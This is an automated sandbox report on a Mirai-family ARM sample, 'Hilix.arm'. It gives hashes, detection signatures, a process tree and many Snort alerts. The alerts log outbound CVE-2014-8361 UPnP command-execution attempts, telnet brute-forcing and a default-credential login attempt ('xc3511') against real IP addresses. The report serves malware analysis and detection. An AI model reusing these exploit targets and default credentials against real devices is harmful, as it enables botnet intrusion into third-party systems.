Play interactive tour

Edit tour

Linux Analysis Report Hilix.arm

Overview

General Information

Sample Name:	Hilix.arm
Analysis ID:	513293
MD5:	9653f94dca32a23046c21ffeea172dd6
SHA1:	a7037a2353ddf06c10144563b077c906b92ebbfa
SHA256:	dcd35159cd640f9b66aad91d5dc7d1e81fffd2478c1e44e0f3184db70285040f
Tags:	Mirai
Infos:
Most interesting Screenshot:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Sample tries to kill many processes (SIGKILL)

Connects to many ports of the same IP (likely port scanning)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	513293
Start date:	02.11.2021
Start time:	01:45:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Hilix.arm
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.spre.troj.linARM@0/6@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

Hilix.arm (PID: 5244, Parent: 5115, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/Hilix.arm

Hilix.arm New Fork (PID: 5246, Parent: 5244)

Hilix.arm New Fork (PID: 5247, Parent: 5244)

Hilix.arm New Fork (PID: 5248, Parent: 5244)

Hilix.arm New Fork (PID: 5252, Parent: 5248)

Hilix.arm New Fork (PID: 5253, Parent: 5248)

Hilix.arm New Fork (PID: 5255, Parent: 5248)

Hilix.arm New Fork (PID: 5257, Parent: 5248)

Hilix.arm New Fork (PID: 5260, Parent: 5248)

systemd New Fork (PID: 5289, Parent: 1)

sshd (PID: 5289, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t

systemd New Fork (PID: 5290, Parent: 1)

sshd (PID: 5290, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D

systemd New Fork (PID: 5404, Parent: 1)

sshd (PID: 5404, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t

systemd New Fork (PID: 5405, Parent: 1)

sshd (PID: 5405, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D

systemd New Fork (PID: 5408, Parent: 1)

sshd (PID: 5408, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t

systemd New Fork (PID: 5409, Parent: 1)

sshd (PID: 5409, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D

cleanup

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Hilix.arm	Virustotal: Detection: 53%			Perma Link
Source: Hilix.arm	ReversingLabs: Detection: 63%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42190 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42190 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42192 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42938 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42938 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42940 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52534 -> 45.195.65.222:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52534 -> 45.195.65.222:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41374 -> 45.115.242.71:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41374 -> 45.115.242.71:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37956 -> 45.120.78.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37956 -> 45.120.78.8:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37998 -> 45.33.253.20:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37998 -> 45.33.253.20:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41988 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41988 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42370 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42370 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42376 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43734 -> 45.126.231.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43734 -> 45.126.231.52:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42000 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53188 -> 45.115.241.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42808 -> 45.120.204.46:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42808 -> 45.120.204.46:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49774 -> 45.126.231.173:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49774 -> 45.126.231.173:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38276 -> 45.195.11.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38276 -> 45.195.11.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41826 -> 45.42.86.119:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41826 -> 45.42.86.119:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35304
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35304
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46844 -> 45.195.8.141:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46844 -> 45.195.8.141:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:57880
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:57880
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:32954 -> 64.85.48.118:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59500 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59500 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59502 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52730
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49498 -> 45.33.251.25:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49498 -> 45.33.251.25:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:57454
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:57454
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60606 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60606 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60624 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50314 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50314 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50318 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44216 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44216 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44220 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48390 -> 185.182.49.106:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48390 -> 185.182.49.106:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51856 -> 45.33.249.12:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51856 -> 45.33.249.12:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52826
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35174 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35174 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35180 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37322 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37322 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37324 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42786 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42786 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42792 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52880
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53568 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53568 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53570 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:53340 -> 80.229.103.151:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:53340 -> 80.229.103.151:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60964 -> 45.115.237.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60964 -> 45.115.237.198:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35526
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35526
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49632 -> 45.113.3.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49632 -> 45.113.3.178:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58144
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58144
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52998
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46480 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46480 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34652 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34652 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46486 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34656 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41238 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41238 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41248 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37898 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37898 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37900 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33250
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33250
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50282 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50282 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50288 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36600 -> 45.117.146.14:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36600 -> 45.117.146.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37908 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37908 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37916 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53780 -> 45.43.224.238:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53780 -> 45.43.224.238:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56812 -> 45.43.232.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56812 -> 45.43.232.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53460 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53460 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53464 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36894 -> 45.91.226.68:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36894 -> 45.91.226.68:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:57742
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:57742
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53074
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52752 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52752 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52754 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48052 -> 45.133.119.206:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48052 -> 45.133.119.206:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40946 -> 45.41.89.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40946 -> 45.41.89.70:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59546 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59546 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59550 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53796 -> 45.43.235.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53796 -> 45.43.235.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59826 -> 45.195.158.235:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59826 -> 45.195.158.235:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57990 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57990 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57992 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42006 -> 91.76.168.63:52869
